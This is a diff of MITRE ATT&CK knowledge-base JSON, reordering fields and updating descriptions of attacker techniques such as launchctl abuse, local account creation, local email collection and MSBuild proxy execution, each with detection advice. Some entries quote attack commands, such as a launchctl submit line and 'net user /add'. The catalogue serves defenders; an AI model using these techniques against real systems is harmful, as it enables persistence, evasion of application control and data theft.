- "x_mitre_detection": "Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. ",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_data_sources": [
+ "File monitoring"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_effective_permissions": [
"root"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "File monitoring"
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. ",
+ "x_mitre_platforms": [
+ "macOS"
]
},
{
@@ -14818,7 +15396,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Launchctl",
- "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nBy loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)\n\nRunning a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\". Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.",
+ "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nBy loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)\n\nRunning a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\". Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.",
"id": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -14827,23 +15405,23 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T18:28:34.600Z",
+ "modified": "2020-06-08T23:28:29.079Z",
"created": "2020-03-10T18:26:56.187Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
],
+ "x_mitre_detection": "KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.",
- "x_mitre_permissions_required": [
- "User",
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"external_references": [
@@ -14887,21 +15465,21 @@
],
"modified": "2020-03-23T22:41:14.739Z",
"created": "2019-12-03T14:15:27.452Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "root"
],
+ "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_data_sources": [
"Process command-line parameters",
"File monitoring",
"Process monitoring"
],
- "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_permissions_required": [
- "root"
- ],
- "x_mitre_remote_support": false,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"external_references": [
@@ -14937,22 +15515,22 @@
],
"modified": "2020-03-29T23:12:40.041Z",
"created": "2020-02-04T19:24:27.774Z",
- "x_mitre_platforms": [
- "macOS",
- "Linux"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
],
+ "x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.",
- "x_mitre_permissions_required": [
- "User",
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ]
},
{
"external_references": [
@@ -14983,23 +15561,23 @@
],
"modified": "2020-03-23T18:04:20.780Z",
"created": "2020-01-28T13:50:22.506Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
"Authentication logs",
"Windows event logs"
],
- "x_mitre_detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15025,21 +15603,21 @@
],
"modified": "2020-03-20T19:39:59.544Z",
"created": "2020-02-21T21:07:55.393Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -15078,21 +15656,21 @@
],
"modified": "2020-03-23T21:48:41.083Z",
"created": "2020-03-13T20:26:46.695Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Authentication logs"
- ],
- "x_mitre_detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.",
+ "x_mitre_data_sources": [
+ "Authentication logs"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15116,26 +15694,39 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-24T16:38:51.557Z",
+ "modified": "2020-05-26T19:23:54.854Z",
"created": "2020-03-13T21:13:10.467Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows",
- "AWS",
- "GCP",
- "Azure"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-02-19T18:46:06.098Z",
+ "modified": "2020-03-24T17:59:20.983Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004",
+ "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)",
+ "name": "Local Email Collection",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -15153,22 +15744,6 @@
"description": "Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Local Email Collection",
- "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)",
- "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-03-24T17:59:20.983Z",
- "created": "2020-02-19T18:46:06.098Z",
"x_mitre_platforms": [
"Windows"
],
@@ -15209,22 +15784,22 @@
],
"modified": "2020-03-26T17:48:27.871Z",
"created": "2020-03-12T19:29:21.013Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--c0a384a4-9a25-40e1-97b6-458388474bc8",
@@ -15354,16 +15929,16 @@
],
"modified": "2020-03-27T16:49:15.786Z",
"created": "2020-01-10T16:01:15.995Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3",
@@ -15403,16 +15978,16 @@
],
"modified": "2020-03-24T23:45:03.153Z",
"created": "2020-01-10T03:43:37.211Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_data_sources": [
"Process monitoring",
"Windows Registry"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -15437,7 +16012,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "MSBuild",
- "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
+ "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
"id": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -15446,22 +16021,38 @@
"kill_chain_name": "mitre-attack"
}
],
- "modified": "2020-03-29T19:56:43.201Z",
+ "modified": "2020-06-08T23:29:28.074Z",
"created": "2020-03-27T21:50:26.042Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Process monitoring"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_system_requirements": [
" .NET Framework version 4 or higher"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_data_sources": [
+ "Process monitoring"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2020-03-15T16:21:45.131Z",
+ "modified": "2020-03-26T20:28:00.985Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
+ "description": "Adversaries may communicate using application layer protocols associated with electronic map delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
+ "name": "Mail Protocols",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -15474,22 +16065,6 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Mail Protocols",
- "description": "Adversaries may communicate using application layer protocols associated with electronic map delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",
- "id": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-26T20:28:00.985Z",
- "created": "2020-03-15T16:21:45.131Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -15539,30 +16114,30 @@
],
"modified": "2020-02-18T18:03:37.481Z",
"created": "2020-02-18T18:03:37.481Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Windows User Account Control",
+ "System access controls",
+ "File system access controls"
+ ],
+ "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Access tokens",
"API monitoring"
],
- "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
- "x_mitre_defense_bypassed": [
- "Windows User Account Control",
- "System access controls",
- "File system access controls"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_effective_permissions": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15588,24 +16163,40 @@
],
"modified": "2020-03-11T14:55:56.177Z",
"created": "2020-03-11T14:49:36.954Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
"x_mitre_data_sources": [
"Anti-virus",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-03-11T14:43:31.706Z",
+ "modified": "2020-03-11T14:43:31.706Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
+ "name": "Malicious Link",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -15613,22 +16204,6 @@
"url": "https://attack.mitre.org/techniques/T1204/001"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Malicious Link",
- "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
- "id": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-11T14:43:31.706Z",
- "created": "2020-03-11T14:43:31.706Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -15688,26 +16263,27 @@
"phase_name": "collection"
}
],
- "modified": "2019-07-18T15:36:27.346Z",
+ "modified": "2020-07-14T19:39:44.590Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Justin Warner, ICEBRG"
],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_detection": "This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications",
"x_mitre_data_sources": [
"Authentication logs",
"Packet capture",
"Process monitoring",
"API monitoring"
],
- "x_mitre_contributors": [
- "Justin Warner, ICEBRG"
+ "x_mitre_detection": "This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15747,24 +16323,24 @@
],
